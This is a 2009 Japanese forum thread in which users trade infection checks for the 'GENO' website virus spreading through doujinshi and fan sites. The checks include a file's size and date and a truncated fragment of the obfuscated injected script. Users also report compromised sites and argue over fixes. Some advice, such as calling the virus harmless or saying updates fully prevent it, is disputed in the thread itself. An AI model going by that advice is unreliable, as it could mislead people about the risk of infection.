662 :GENO:2009/05/16(土) 17:18:37 ID:VYAnahaqP
セキュリティ板のGENOスレに、初心者さんは質問にいかないように・・・
同人スレから流れた感染者があっちのスレで質問しまくって
住人に嫌がられはじめたので

663 :GENO:2009/05/16(土) 17:18:45 ID:skrVh21r0
>>652
検索サイトやってるからというのは免罪符にならない
少なくともこのスレ読めば感染したかどうかわかるんだから聞く前に読もうよ

664 :GENO:2009/05/16(土) 17:18:47 ID:vbTPAchq0
>>621
テニミュって生の方に入れた方がよくないか?

665 :GENO:2009/05/16(土) 17:18:52 ID:oQ1szY8z0
>>388でも同じこと書いてるけど、もう一回。
ウィルスの感染確認するのに、もうcmd.exe、regedit.exeの立ち上がりの有無は
判定方法にならないみたいだから、まとめサイトと次スレテンプレを
書き換えませんか?

666 :GENO:2009/05/16(土) 17:18:54 ID:pFmk+oGT0
>>658
ここまで来ると呆れて何も言えない

667 :GENO:2009/05/16(土) 17:19:27 ID:sCtorif20
>>642
XPです

668 :GENO:2009/05/16(土) 17:20:16 ID:TrcSX6JmO
>>662
こっちでも初心者免罪符にしてまとめ読まないアホが多発してるがな…

669 :GENO:2009/05/16(土) 17:20:31 ID:gYwor6P50
>>652
だからそんなこわいなら幸全部消して404にして回線物理的に切っとけよ
こわいこわい言いながら幸運営してネットしてるお前が一番怖い

670 :GENO:2009/05/16(土) 17:20:46 ID:pFmk+oGT0
>>667
アウト

671 :GENO:2009/05/16(土) 17:20:58 ID:ZjGJKiW50
>>633
ブラクラチェッカーだから今回のウィルスは関係ないとはいえ「安全度100%」が皮肉だな…w

672 :GENO:2009/05/16(土) 17:21:12 ID:UiMFkn+s0
>>662
元々、万年素人とか無知ゆとりの類が行っちゃいけない板なのに何も考えず誘導しまくるからだな

673 :GENO:2009/05/16(土) 17:21:29 ID:uACsvbNb0
まとめWiki、FAQの名称を「よくある質問」や
「質問する前に」などに変更するのはどうだろう
ここまで読まない奴だらけだと無駄かもしれないが

674 :GENO:2009/05/16(土) 17:21:57 ID:xF88a00E0
>>652
ウイルスの症状ないのに「アウトですか?」って訊くと
同じように問題ない人まで疑心暗鬼にさせるからやめれ。
検索サイト持ちだからっていうのは理由にならん。

675 :GENO:2009/05/16(土) 17:22:03 ID:rdW8H0F70
>>644
まとめでも罠リンク貼られた云々って言われて碌にリンク踏めないんよ

676 :GENO:2009/05/16(土) 17:23:45 ID:cN6MMg830
よくある質問

・sqlsodbc.chmが見つからない!
 Windowsのバージョンによってある場所が違います。
 ・XP C:\WINDOWS\system32
 ・Vista  C:\Windows\Help\mui\0409 か C:\Windows\Help\mui\0411
 ・98 C:\WINDOWS\system
 スタート→検索でsqlsodbc.chmを探すのが一番手っ取り早いと思われます
 またファイルの日付が2009年3月21日のものは感染している模様です

・sqlsodbc.chmのファイルサイズが49.5kbしかない!
 sqlsodbc.chmを右クリック→プロパティで確認
 50,727 bytesなら正常です



677 :GENO:2009/05/16(土) 17:23:45 ID:pFmk+oGT0
>>675
じゃもう回線切れば

ネットしないのが一番確実な回避法なんだから
今のところその他の「絶対安心」なんて対策はない

678 :GENO:2009/05/16(土) 17:23:57 ID:z/7hYsa00
以前XPマシンでカスペがトロイ警告出したサイト
このスレ見てもしやとvista機でチェックしてみたら<BODY>タグの前に

(function(){var RE90jvar〜20a〜3d〜22〜
(実際は半角でもっと長い)

みたいなJavaScriptコードがあるんだけど、これってアウト?


679 :GENO:2009/05/16(土) 17:24:02 ID:skrVh21r0
>>675
なんでそこだけは読んで後に編集する人限定したから大丈夫な流れ読まないんだ

680 :GENO:2009/05/16(土) 17:24:31 ID:JLSn9lA+0
>>675
今はもう立ち上げ人以外は更新できないようになってるから、罠リンクに関しては大丈夫

681 :GENO:2009/05/16(土) 17:24:38 ID:r/NKCaP60
>>675
このスレ読んでるなら少なくともここのまとめはもうそんな事ないのわかりきってるだろ
それすら信用できないなら情報収集なんてしようと思わないで落ちればいいんだよ

682 :geno:2009/05/16(土) 17:24:48 ID:+wdKdS+H0
>>664
まとめサイトには書いてあるけどもうテニミュだけじゃなくて
普通のファンサイト、同人サイトも感染してるらしい

683 :GENO:2009/05/16(土) 17:24:48 ID:1Jd1LSOl0
放置してヤバイことになるより、一時の恥を選んでお尋ねします
VistaのUACって、デフォルトの設定ですか?
デフォルトならいいんだけど、自分で設定する必要があるならどこから行うのかご教授願いたい

684 :GENO:2009/05/16(土) 17:25:29 ID:uxBht6KT0
>>545
自分のところもファイルサイズが同じ
HDDクリーンアップのときに圧縮したみたいなんだけど、それでファイルサイズって変わる?

一応、再インスコの準備はしてるけど、それが気になる

685 :GENO:2009/05/16(土) 17:25:43 ID:428P6x+x0
>>678
それだけの情報じゃわかりません

閲覧者を不必要に不安にさせるようなことはうかつに書き込まないように

686 :GENO:2009/05/16(土) 17:25:45 ID:ZLlUDLbH0
>>678
アウツ

>>683
デフォ

687 :GENO:2009/05/16(土) 17:26:24 ID:HMcvEjSE0
>>683
このスレ100回読みなおせクズ

688 :GENO:2009/05/16(土) 17:26:46 ID:428P6x+x0
>>683
そこまでくると流石にスレ違い
firefoxでjavaスクリプト切って自分でググれ

689 :GENO:2009/05/16(土) 17:27:10 ID:smog3tIQ0
>>668
でもあっちで初心者丸出し質問されるよりこっちで対処した方がマシだわ

690 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:27:16 ID:ML/xDnST0
まとめwiki見るのが怖いなら、
最低限このスレの >>1-10 読め。

Adobe関係の最新バージョンと確認方法は >>274

691 :GENO:2009/05/16(土) 17:27:35 ID:OPjvi40EO
>>688
今はググらせちゃ駄目だろ

692 :GENO:2009/05/16(土) 17:27:46 ID:428P6x+x0
なんで自分で調べようと思わないんだろう…

693 :GENO:2009/05/16(土) 17:28:12 ID:RwVE/EfH0
>>682
いやだから、テニミュはナマモノ扱い、テニプリは漫画扱いではないかということ
なんじゃなかろうか。

694 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:28:27 ID:NG0XsJSj0
FlashもReaderもどっちも消せばどうということはない

695 :GENO:2009/05/16(土) 17:28:44 ID:lFaYB71c0
>>692
ここで聞く=自分で調べてると思ってんだろ

696 :GENO:2009/05/16(土) 17:29:06 ID:skrVh21r0
>>693
> >>682
> いやだから、テニミュはナマモノ扱い、テニプリは漫画扱いではないかということ

それでいいと思うけどな
ミケでもコード違うんだからジャンルが違うと思っても間違いないし

697 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:30:16 ID:JsLvVHuyP
騒ぎすぎ
Cドライブ全削除するわけでもなく実害は無いに等しい
気にしなければ問題なし
スパイウェアみたいなもん

698 :GENO:2009/05/16(土) 17:30:31 ID:ZefNRz2i0
知人にGENOウイルスの話したら サイト持ってないから関係ないしwwwwって言われた……
まさに>>452の典型 こういう人にはどう言ったらいいのだろうか

普通のサイトにも感染してるよって言っても製薬会社のサイトなんか見ないしwwwみたいな反応

699 :GENO:2009/05/16(土) 17:30:45 ID:HMcvEjSE0
まとめ読むのも惜しいなら少しでも不安になったらクリーンインスコ、サイト削除、パス変更全部やっとけよ
その後ネサフは一切せずに電源落としてケーブルとかはひっこぬく
そうすりゃその間は確実に安心だ

700 :geno:2009/05/16(土) 17:30:51 ID:X4jSMVfI0
>>200のサイト反応してくれないんだけど、結構時間かかるのかな…

701 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:31:26 ID:NG0XsJSj0
これってgenoウイルス以外のういるすさんもダウソしてゾンビPCにするんでしょ
ほわいたーさんとか入れられたら終わるくね

702 :GENO:2009/05/16(土) 17:31:37 ID:uy8wj/XV0
もうセキュ板のURL貼るの止めた方がいいんじゃない?
こっちで初心者ちゃんが暴れるのはともかく、セキュ板の方はまずいよ
まとめスレ>>2があるんだし

>>697
釣りじゃないならマジモンの基地害としか言えない

703 :678:2009/05/16(土) 17:31:42 ID:z/7hYsa00
>686
ありがと、本人に注意喚起のお知らせして、
自サイトでも警告してこよう

ちなみにD.Gray-man、銀魂同人サイトです


704 :GENO:2009/05/16(土) 17:31:53 ID:BpSFSHPIO
>>698
そういう奴ほどGENOウイルスに感染してたりするんだよね

705 :geno:2009/05/16(土) 17:32:11 ID:5qGyw+II0
>>697
クマー

706 :geno:2009/05/16(土) 17:32:25 ID:fsWEj42p0
>>698
「草生やしてる間にも個人情報だだ漏れかもね」とでも言ってやれ

ムダだろうけど

707 :GENO:2009/05/16(土) 17:32:35 ID:VYAnahaqP
>>697
>>4を読んだ上でそれいってるなら楽観的過ぎる


708 :GENO:2009/05/16(土) 17:33:06 ID:jWuewssEO
MEはどうしたらいいんだ…

709 :G:2009/05/16(土) 17:33:11 ID:ZLwS0etV0
>>667
ちょっと試して欲しい事
タスクマネージャを起動してネットワーク使用状況をグラフで見れるようにしておく
また以下をする前のプロセスを覚えておいて欲しい

コマンドプロンプトはあがるみたいだから、
そこからftpと入力
 ftp>
と出ると思うから、1分待って
この間にネットワーク状況やプロセス見ておいて欲しい
open www.example.com
と入力
そのときのネットワーク状況やプロセスがどうなるか知りたい


710 :geno:2009/05/16(土) 17:33:24 ID:E7LcELUR0
ニフティ感染?

711 :geno:2009/05/16(土) 17:33:46 ID:bmeWatfA0
>>698
今回のことに限らずだけど、クレカのパス盗まれて、変な請求キター!
とか、自分に実害が及ばないと普通の人の反応なんてそんなものだよな…
パソコンに詳しくないくせに危機感ゼロ。

712 :GENO:2009/05/16(土) 17:34:08 ID:Twq95x0L0
> ウイルス定義データベースをアップデートするまでお待ちください
> 製品 @niftyウイルスチェックサービス のライセンスを確認中に不明のエラーが検出されました。

って出たけどこれアウトだからの結果?


713 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:34:29 ID:ztB8Zhmo0
>>698
・ウイルスに感染悪化→ある日パソを起動すると画面が真っ青に
それかクレジットや通販関係のパス抜かれる可能性あるって言っとけ
具体的でわかりやすいのはそのへん

714 :GENO:2009/05/16(土) 17:34:53 ID:uy8wj/XV0
>>708
窓から投げ捨てろ

715 :geno:2009/05/16(土) 17:35:16 ID:ztB8Zhmo0
>>713
名前欄忘れた。>>698宛ね

716 :GENO:2009/05/16(土) 17:36:12 ID:OmZTJmEN0
>>685
この情報だとアウトってくらいわかりそうなもんだが・・・
あとググレカスで誘導するよりwiki見ろって誘導のほうがイーンジャネーノ?

717 :GENO:2009/05/16(土) 17:36:38 ID:nxtnhayc0
>>702
向こうはこちらをダシにする荒らしだらけになってスレが機能しなくなり始めてる
これ以上誘導し続けるのは駄目だ

718 :2:2009/05/16(土) 17:36:55 ID:n/uQJHr/0
>>665
「とりあえず感染してるか〜」に追記しました

715まで確認、漏れあったら指摘よろしく

719 :GENO:2009/05/16(土) 17:37:03 ID:lapl18Rv0
>708
ME使ってる時点で既にアウトギリギリだろ
GENOに限らずとっくの昔に何かに感染してる可能性が

720 :ウイルス:2009/05/16(土) 17:37:20 ID:dncZC0E3O
ニフティのオンラインスキャンでは感染見つからなかったしソースの改ざんも大丈夫だったけど
何故か金曜日からネット立ち上げた後フリーズしたりデスクトップアイコンクリックできなくなって終了時に開いたりする
これはウイルスと関係あるのか

721 :geno:2009/05/16(土) 17:38:21 ID:t+UZlBwU0
>>646
ありがとう!今確認したら最新バージョンだった。
firefoxにてjavaスクリプト遮断&NOスクリプト入れてます。

722 :665:2009/05/16(土) 17:38:24 ID:oQ1szY8z0
>718
対応ありがとうございました。
まとめサイト、非常に助かってます。ありがとうございます。

723 :GENO:2009/05/16(土) 17:38:38 ID:0G5FPF7HO
自分報告
ボカロのカイミクサイト感染しました
仲間内も全員感染してたのでサイト完全に全部削除したけど注意

724 :GENO:2009/05/16(土) 17:38:39 ID:VYAnahaqP
質問しにくる初心者は、この感染具合からみて
減ることは無さそうなので初心者の質問あたりに
質問専用GENOウイルススレ立てることを提案

725 :GENO:2009/05/16(土) 17:38:44 ID:RwVE/EfH0
>>720
他のウイルスかもしれないけど
一般的なアンチウイルスソフト入れたり、窓アップデートはしてないの?

726 :GENO:2009/05/16(土) 17:38:45 ID:2lgCZZxBO
>>696同意

飛翔の項目に、テニスの王子様(同人)

芸能の項目に、テニミュ(同人・ファンサイト)

の方がわかりやすいと思う

727 :geno:2009/05/16(土) 17:39:08 ID:DfiUFOfq0
FC2ブログが感染って単なる風評?それとも本当?
自分のブログのソースはとりあえず問題なかったけど
感染してる鯖まるごとゾンビ化してるなんて恐ろしいことはないよね?

728 :GENO:2009/05/16(土) 17:39:28 ID:uy8wj/XV0
この勢いだと夜には次スレが立つだろうから
次からは>>1の関連スレはなくして欲しい
セキュ板のほうは同人知らない人だってたくさん見るんだし
アフォな質問でスレを埋めるのは勘弁

正直、>>1からのテンプレとまとめwikiだけでも充分
もっとも、今のところ絶対大丈夫なんて対策は
ネット切断くらいしかないけど

729 :GENO:2009/05/16(土) 17:39:39 ID:Kv96HR5gO
>>708
DSP版XP買ってこい

730 :GENO:2009/05/16(土) 17:40:54 ID:TV+NV+ev0
>>727
グレンスレの妙な報告だけだからまだわかってない

731 :GENO:2009/05/16(土) 17:41:05 ID:4Ed0MWLw0
XPでもUserAgentを偽装すれば感染しなかったよ
Vistaを狙うウイルスやUserAgentで判別しないウイルスが出てきたらアウトだけど

732 :GENO:2009/05/16(土) 17:41:24 ID:zlsW0HIw0
>>721
configのスペル間違ってた、スマンw
>>9も忘れずに。
flashとreaderは最新verでも絶対安心ということはないから注意

733 :GENO だから報告は名前欄に「報告」入れてくれー!:2009/05/16(土) 17:41:39 ID:ujLFTIV80
だから

報告は名前欄に「報告」入れてくれー!

流れも早いんだし、せっかく報告するんだから、
更新する人が見つけ易いように協力してあげようよ


734 ::2009/05/16(土) 17:43:07 ID:mw4bEjk60
>>513
>>532
まとめサイトなんだから当然検索にも引っかかる
ロボット除けしてもこのスレッドが引っかかるから無意味

まとめサイトだから他のスレでもまとめとしてそのアドレスが載せられる

735 :geno:2009/05/16(土) 17:43:20 ID:DAWCjk8m0
俺のPCはよかったんだが親のが心配だ・・・
マカフィーでウイルス見つかる?

736 :GENO:2009/05/16(土) 17:43:47 ID:JLSn9lA+0
>>2
>>723の補足
ボーカロイド取扱いサイト(同人)に感染アリ
一応削除済


737 :報告:2009/05/16(土) 17:43:59 ID:0G5FPF7HO
>>733
すいません
もっかい書きます!
ボカロのカイミクサイト感染してました。
仲間内も全員感染してたんで(幸通して8以上だと思います)サイト全部削除しました


738 :GENO:2009/05/16(土) 17:45:51 ID:rmKKQtMq0
>>735
>>1

739 :GENO:2009/05/16(土) 17:46:19 ID:JLSn9lA+0
>>737
じゃあ次はOS再インスコだな。
そんでその後はFTPのID、パス変更
まあ全部終わってんならスルーしてくれ

740 :GENO:2009/05/16(土) 17:46:23 ID:PitVBKa40
質問
とりあえず現時点では感染していないのでavastを入れてみたんだけど
普通にインストールするだけでおkですか?
何か設定が必要だったら教えてください

741 :GENO:2009/05/16(土) 17:46:30 ID:lapl18Rv0
>>735
まとめサイト見ろってんですよ

742 :geno:2009/05/16(土) 17:46:38 ID:Yj4M5Gzw0
>>735
マカフィーみたいなクソソフトが対応してるわけないじゃん

743 :GENO:2009/05/16(土) 17:47:27 ID:lYCNv42G0
>>740
微妙にスレチ

744 :GENO:2009/05/16(土) 17:47:47 ID:ZefNRz2i0
>>698です。みんなレスありがとう!>>713を言ってみます。
ビビりすぎって笑われたのは自分がきちんと理解できてなくてうまく説明できなかったのも原因だと思うけど、
サイトやSNSで注意喚起する時に>>698的な認識の人にもちゃんと伝わるようにすることが感染拡大を抑えるために大事な気がする。

745 :GENO:2009/05/16(土) 17:47:49 ID:BpSFSHPIO
>>735
残念ながら今のところマカフィーは役に立ちません・・・

746 :GENO:2009/05/16(土) 17:48:08 ID:HMcvEjSE0
>>734
伏せ字どうでもいいけどそこまでは気にしなくていいかと。
つーかこういうのイヤなんだろうけどキリないし、そこは気にしても仕方ないよ。

747 :報告補足:2009/05/16(土) 17:48:14 ID:0G5FPF7HO
>>739
全部終わりました!わざわざありがとうございます。
自分のサイトはまだしも感染してた友人のサイトが1700くらい登録のある幸で3位だったので
これから大変なことになる気が………

748 :geno:2009/05/16(土) 17:48:18 ID:rdW8H0F70
>>677
極論に答えは無し

>>679-681
知るかそんなの。聞いてくるやつに聞け。

749 :GENO:2009/05/16(土) 17:48:21 ID:SyLRqLEN0
>>732
セキュ板のほうでも書いたけど、Firefoxが標準で有効にしている先読み機能そのものに問題はない。
リンクに先読みのヒントが与えられていて、キャッシュされたとしても、
実際にブラウザでそのページを開かないかぎり何も起こらない。

それと、どんなソフトでも完全にセキュアということはないし、いたずらに恐怖をあおるのはどうかと思う。
今回の件はFlash PlayerとAdobe Readerを最新版にしてあれば防げる問題でしょう。

750 :GENO:2009/05/16(土) 17:48:52 ID:rmKKQtMq0
>>740
avastスレ逝け

751 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:49:19 ID:5AlQPwu90
>>723
仲間内全員感染って凄いな…恐ろしい

752 :geno:2009/05/16(土) 17:49:28 ID:Twq95x0L0
>>712と同様になってる人居ませんか?

753 :GENO:2009/05/16(土) 17:49:54 ID:pbsx4U5a0
>>747
GYAAA それだともう幸のトップに注意文でも書いてもらったほうがいいような気もする

754 :GENO:2009/05/16(土) 17:50:16 ID:/m6gQ1ZiP
インストール出来ないのに対策するってのもなかなかのものだね…

755 :GENO:2009/05/16(土) 17:50:22 ID:rmKKQtMq0
>ID:rdW8H0F70

馬鹿かこいつは

756 :GENO:2009/05/16(土) 17:50:36 ID:sHpJx3sa0
>>734
そんなどーでもいい終わった話より建設的な話してくれ

757 :GENO:2009/05/16(土) 17:51:28 ID:OmZTJmEN0
>>747
洒落にならん事態だな・・・

758 :GENO 報告は名前欄に「報告」推奨:2009/05/16(土) 17:51:30 ID:ujLFTIV80
Wiki管さん、そろそろジャンルごとの表記のあたりに、
1件どころではない注意を入れてほしいです

例)

※感染報告が1件以上あったジャンルです。順不同。
中には複数から二桁感染のジャンルもあります(感染疑いを含む)
※ここに挙がっていないジャンルも感染が広がっている恐れがあります



759 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:51:44 ID:7BZI/qbJ0
で感染するとどうなるの?
ファイルでもぬかれるの>

760 :GENO:2009/05/16(土) 17:52:01 ID:L1EhDlX40
>>755
自分がどんなレスしたかも分からない池沼相手にしても無駄

761 :GENO:2009/05/16(土) 17:52:24 ID:uy8wj/XV0
>>759
>>1

762 :報告補足:2009/05/16(土) 17:52:25 ID:0G5FPF7HO
>>753
幸の管理人さんもPC感染していたので、
サイト削除済みです。
やばいっすよねやっぱりこれ

763 :GENO:2009/05/16(土) 17:52:33 ID:A9qSW+uH0
>>749
>今回の件はFlash PlayerとAdobe Readerを最新版にしてあれば防げる問題でしょう。

お前は何を言っているんだ

764 :GENO:2009/05/16(土) 17:52:50 ID:pbsx4U5a0
>>759
>>1を見上げてごらん

765 :GENO:2009/05/16(土) 17:53:04 ID:lA4iAsSeO
>>727
FC2ブログはJavaScriptタグが無効にならないから、誰かが感染して埋め込まれると
そのブログのRSSで感染スクリプト一括送信→受信したトコも閲覧した人も皆
アウト!ってー恐ろしい図式が…ってのはどっかで見たけど、感染報告あったの!?

766 :GENO:2009/05/16(土) 17:53:18 ID:RwVE/EfH0
>>747
幸管理人に頼んで幸トップに告知だしてもらってほしい

ボカロ使える人に頼んで
ウイルス注意って歌って貰うとか無責任なことを思いついたw

767 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 17:53:29 ID:eQafMeB50
>>740
重くてうざくても常駐保護は全部入れて最高設定に

768 :GENO:2009/05/16(土) 17:54:27 ID:JLSn9lA+0
>>747
幸通して…ってまさか幸もじゃないよな。
ないなら幸管理人に連絡+注意文のお願い出した方がいい
あと、サイト再建するならウィルスかかってたよごめんね+みんなチェックしてねのお知らせを書くべし

>>748
なんで俺も怒られてんの

769 :GENO:2009/05/16(土) 17:54:52 ID:uy8wj/XV0
>>749
適当なこと言ってんなよ。
現時点で「〜しておけば絶対妨げる」なんてもんはないんだよ。

770 :GENO:2009/05/16(土) 17:55:04 ID:A9qSW+uH0
FC2ブログのは1回だけ書き込みがあって
詳細もなく曖昧なまま

FC2ブログで何かあったらとっくにレンタル元が
何か声明出してると思うけどな

771 :GENO:2009/05/16(土) 17:55:11 ID:pbsx4U5a0
>>762
とにかく大事なのは一刻も早くクリインストしてサイトに注意文をあげることではないか
3位ならブクマしてる人も多いだろうから見てくれる人も多いだろうし

772 :GENO:2009/05/16(土) 17:55:15 ID:wC2VoGPT0
>747
幸管も!?
危ないなあ…告知は出てないのかな

773 :GENO:2009/05/16(土) 17:55:18 ID:sm/UqJZG0
>>747
日のヒットがどんだけだかわかんないんだけど
3/1700って相当やばくないか?
サーチの名前とか載せちゃまずいのかな
そのくらいしないとやばいと思うんだけど

774 :GENO:2009/05/16(土) 17:55:31 ID:5AlQPwu90
>>768
>>762

775 :GENO:2009/05/16(土) 17:55:55 ID:lapl18Rv0
>762
うわあああああああああああああああ

削除済みって、幸削除して跡地は?
告知してないなら即刻した方が良いと思うんだが

776 :GENO 報告は名前欄に「報告」推奨:2009/05/16(土) 17:56:09 ID:ujLFTIV80
だが1のこれ

>感染の場合ワクチンはなく、クリーンインスコ必須、パス変必須(FTPパス抜きされる)です。

はっきりいって被害の実態がわかりにくいよね
確認点は2でいいと思うよ
そろそろ次スレのテンプレ考えるわ

777 :geno:2009/05/16(土) 17:56:10 ID:MBvlamBZP
ここには知識人が集まってると思うのかもしれんが
みんな自分で調べてきたから知ってるだけだ

大抵の答えはwikiや2ちゃん内にある
今回はとりあえずググるな
調べろ

778 :GENO・チラ裏:2009/05/16(土) 17:56:16 ID:Sb/N6fL20
てめぇでやれることは全部やったけど同人サイトはおろか、企業サイトを回るのも何か気後れする…
通販で頼みたいものとかもあるのに微妙に恐怖感がある自分はチキンw

それこそこれがもっと巨大サイト(ヤフとかwikiとか楽天TOPとか)が感染してたらもっと大々的に取り上げられて
危機感ももっと生まれるんだろうけど、そんなことになったらパンデミックどころの騒ぎではないな…

779 :GENO:2009/05/16(土) 17:56:36 ID:sJSkDarN0
そろそろデザフェス帰り組の質問攻勢が始まりそうな予感が…

780 :報告補足:2009/05/16(土) 17:56:36 ID:0G5FPF7HO
>>768
>>762
幸の管理人さんの個人サイトが感染してると言ってたので、幸も感染してると思います
当該サイトと幸は既に削除済みですけど大事件の予感

781 :GENO:2009/05/16(土) 17:56:59 ID:RlsoA2wS0
5月7日にjavascript切ってない状態の火狐で感染サイト見たが
症状は現れず、ニフティのスキャンでも検出されない
まあ、感染サイトを見たのは確実なので再インスコするが
感染してても全く分からないことがあるかもしれんって報告だけしとく

782 :GENO:2009/05/16(土) 17:57:22 ID:TV+NV+ev0
日本の同人が終わる日が近づいてる…のか?

783 :GENO:2009/05/16(土) 17:57:22 ID:JLSn9lA+0
>>762
ポーン( Д )⌒Y⌒Y⌒Y⌒Y⌒Y⌒...。....。コロコロ
やばいどころのレベルじゃなかったか

>>774
うん、>>762を見る前だったのよ、ごめん

784 :GENO:2009/05/16(土) 17:57:51 ID:OPjvi40EO
>>770
FC2は各種障害を広報しなかったり
全然復旧してないのに「解決しました」と言ったり
運営側より有志のサポートのほうが安心だったりする

785 :GENO:2009/05/16(土) 17:58:36 ID:A9qSW+uH0
>>780
てかサーチ感染の場合はジャンル教えてほしいんだけどな

786 :GENO:2009/05/16(土) 17:58:39 ID:RwVE/EfH0
>>780
削除して黙ってるのかひょっとして!?
ウイルス注意とか書いてある跡地すらないんかい!?

787 :GENO:2009/05/16(土) 17:58:40 ID:58PrCe2G0
明日にイベがあった気がするから
オフもやってる管理人はもしかしたら気づいてない人も居るかもと思うと…

788 :GENO:2009/05/16(土) 17:58:55 ID:5qGyw+II0
>>781
感染してても、PCの環境によっては反応を起こさないらしい
やっぱりXPでIEな層狙いなんだろうな

789 :GENO:2009/05/16(土) 17:58:56 ID:vNLIWV+e0
うげぇ、幸感染は被害甚大だぞ。

790 :GENO:2009/05/16(土) 17:59:27 ID:wC2VoGPT0
跡地がないなら最低の幸管だな

791 :GENO:2009/05/16(土) 17:59:37 ID:vNLIWV+e0
>>785
ボーカロイドだと思うよ

792 :geno:2009/05/16(土) 17:59:40 ID:fsWEj42p0
>>780
もしボカロ系SNS参加してるならそっち経由でも周知したほうがいいかもしれんね・・・。

そんでもって確か明日ボーマスだよな。

793 :GENO:2009/05/16(土) 18:00:02 ID:skrVh21r0
>>787
明日大阪インテでシティあるから遠征組みは明日の夜以降に気づきそうだな

794 :geno:2009/05/16(土) 18:00:10 ID:t+UZlBwU0
手ブロやってる人は描いてくれたら嬉しいなと思うんだけど
どうなんだろう・・・何となく手ブロにいるリアな人達は全く無警戒ぽくて怖い

795 :2:2009/05/16(土) 18:00:10 ID:n/uQJHr/0
>>780 幸はボカロでいいすか

>>758修正しました
名前欄とても助かります
他の方もせめて>>2にアンカもらえるとうれしい

796 :GENO:2009/05/16(土) 18:00:18 ID:GfLVqANbO
明日はインテじゃなかったか
しかも地理的にリアルインフル発生、厚生大臣が朝からずっとインタビューしてたぞ

797 :GENO:2009/05/16(土) 18:00:42 ID:smog3tIQ0
ウイルス感染に伴いサイト削除ついでに閉鎖ってとこも多いだろうなあ…

798 :GENO:2009/05/16(土) 18:01:54 ID:OmZTJmEN0
924 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 17:56:27
ふたばもやられたみたいなスレ見たが

799 :GENO:2009/05/16(土) 18:02:23 ID:M2vWSK4y0
まとめサイトの隠の王が陰の王になってるんで修正よろしくです。

800 :G:2009/05/16(土) 18:03:00 ID:ZLwS0etV0
うーん、レスに埋もれたか居なくなられたか良く分からないけど、>>709はもういいので
クリーンインストールしてください。

801 :geno:2009/05/16(土) 18:03:21 ID:Sg4Oi56G0
明日、インテックス大阪でイベントあるよー
赤豚主催のオールジャンル
基本は女性メインだけど、一概には言えない

お買い物リスト作るために、サイトを巡回する人が
今夜は多い悪寒……

802 :GENO:2009/05/16(土) 18:03:27 ID:Rw1rL7iI0
780はボカロだろ?最初に書いてある

803 :GENO:2009/05/16(土) 18:04:01 ID:xmkBc4L6P
「ウィルス蔓延を防ぐことよりジャンルwを維持するほうが大事!」って人は
リアルでなんか病気が流行してもコミケとかに無理矢理行って感染拡大させてるようなもんだと思え。


今回のウィルスじゃないが、
女性向け同人同士だと正直知り合い程度の人に名乗って「ウィルス感染してるよ」って注意しにくいし
注意しても「えーよくわかんない;;;サイト消せばいいの?」って程度の人多いよ。
でもそんなこと言ってる場合じゃないなw

804 :GENO:2009/05/16(土) 18:04:30 ID:wQTybYbw0
気づいてないだけの人もまだまだ多いだろうから感染者
これからまた増えるだろうね

805 :GENO:2009/05/16(土) 18:04:46 ID:RwVE/EfH0
インテはインフルとでダブルパンチになりそうな………

806 :GENO:2009/05/16(土) 18:05:30 ID:RwVE/EfH0
>>2さん
隠の王だよ陰じゃないよー

807 :GENO:2009/05/16(土) 18:05:51 ID:SyLRqLEN0
>>763
あれ? じゃあ未知の脆弱性ってこと?

>>769
今まであちこちのスレで報告されてきたものに関していえば絶対防げるだろ。
それ以上何を期待してるんだ。

808 :GENO:2009/05/16(土) 18:06:47 ID:wkc6k7iU0
>>803
とっくに終わった話題を引きずらないでこれからの話をしようぜ先輩
つか今多くが見てるであろう携帯クラシックメニューからAA判定されちゃってるから

809 :GENO:2009/05/16(土) 18:07:03 ID:VbtPfjcW0
絶対防げるはありえないな
ましてやGENOは駆除もできない極悪ウイルス

810 :GENO:2009/05/16(土) 18:07:10 ID:lFaYB71c0
跡地すらも感染してるよって報告が今までに何件かあったし
再インスコでまたお知らせ出せるまでには少し時間かかるだろ
優先順位をどうすべきなんだこれ…

811 :GENO:2009/05/16(土) 18:07:11 ID:IgRMmjVnO
今携帯だからちゃんと確認出来ないけど、ふたば虹裏もやられたっぽいので注意

812 :GENO:2009/05/16(土) 18:07:37 ID:58PrCe2G0
ウイルスでリアルもサイト(二次元)も\(^o^)/オワタなんて事になるよか
きっちり確認とか取れるだけの対策しておくれよーと思うんだが
サーチ管理人に伝達しても注意喚起してくれねえ…
わかんねえなんて言ってるうちに、オワタになったらどうするんだよ…
どうにかして注意喚起できないだろうか

813 :GENO:2009/05/16(土) 18:07:56 ID:pcqA0/KN0
虹裏やられたってやばいな
すごい被害になりそうだ

814 :GENO:2009/05/16(土) 18:08:23 ID:OmZTJmEN0
>>803
豚インフルも流行ってるのに今更キャンセルできなーいって
強行に海外旅行に行った馬鹿共と同類だな

815 :GENO:2009/05/16(土) 18:09:08 ID:wkc6k7iU0
>>810
とりあえずサイトに埋め込まれちゃってるなら跡形なく削除が最優先じゃないかな
跡地はなんか危険っぽい

816 :GENO:2009/05/16(土) 18:09:18 ID:TV+NV+ev0
>>811>>813
( ゚∀゚) アヒャヒャヒャヒャヒャヒャ

もうネットできんなこりゃ…

817 :GENO:2009/05/16(土) 18:09:23 ID:lA4iAsSeO
警告文や謝罪文をうpしようにも、クリーンインストール前じゃ感染してるページを
うpするだけなんだし、まずはサイト全部削除でいいんじゃね?
クリーンインストール終わったら各ソフトアップデートしたりavast!入れたり
火狐入れたりJavaScript切ったり対策して、FTPパス変更→警告文謝罪文作成&
うpってなるから、作業遅い人は半日位掛かるよね…

818 :GENO:2009/05/16(土) 18:09:43 ID:31a6R3Rs0
明らかにおかしいスクリプトがheadとbodyの間にあったら、それはもう確定でいいんだよな?
巡回サイトのソース覗いたら@はさんだ数字の羅列が存在してた\(^O^)/
一応vista使いではあるんだが、あれって感染する場合は閲覧→即時感染なのかな
タイムラグがあるんだったらこまめにチェックしないと危ないってことだよな

adobe readerは9.0、フラッシュは最新なんだが、ここを最新にしとけばとりあえずは
問題ないってことでOK?

819 :GENO:2009/05/16(土) 18:09:47 ID:oibHTpS80
